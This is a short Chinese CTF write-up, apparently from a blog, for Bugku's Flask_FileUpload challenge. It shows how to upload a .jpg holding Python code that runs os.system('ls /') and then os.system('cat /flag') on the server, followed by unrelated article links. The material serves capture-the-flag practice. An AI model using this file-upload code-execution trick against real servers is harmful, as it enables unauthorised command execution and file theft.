技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
IT_陈寒
26 分钟前
Python开发者必知的5大性能陷阱:90%的人都踩过的坑!
前端·人工智能·后端
codingWhat
1 小时前
介绍一个手势识别库——AlloyFinger
前端·javascript·vue.js
代码老中医
1 小时前
2026年CSS彻底疯了:这6个新特性让我删掉了三分之一JS代码
前端
不会敲代码1
1 小时前
Zustand:轻量级状态管理,从入门到实践
前端·typescript
踩着两条虫
1 小时前
VTJ.PRO 双向代码转换原理揭秘
前端·vue.js·人工智能
扉川川
1 小时前
OpenClaw 架构解析:一个生产级 AI Agent 是如何设计的
前端·人工智能
远山枫谷
1 小时前
一文理清页面/组件通信与 Store 全局状态管理
前端·微信小程序
codingWhat
1 小时前
手撸一个「能打」的 React Table 组件
前端·javascript·react.js
HelloReader
1 小时前
Tauri 应用安全从开发到发布的威胁防御指南
前端
bluceli
1 小时前
WebAssembly实战指南:将高性能计算带入浏览器
前端·webassembly
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04Window 10部署openclaw报错node.exe : npm error code 12805本地部署 OpenClaw + DeepSeek-R1 完全指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07OpenClaw优化飞书API 额度已耗尽问题08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录10OpenClaw 飞书机器人不回复消息?3 小时踩坑总结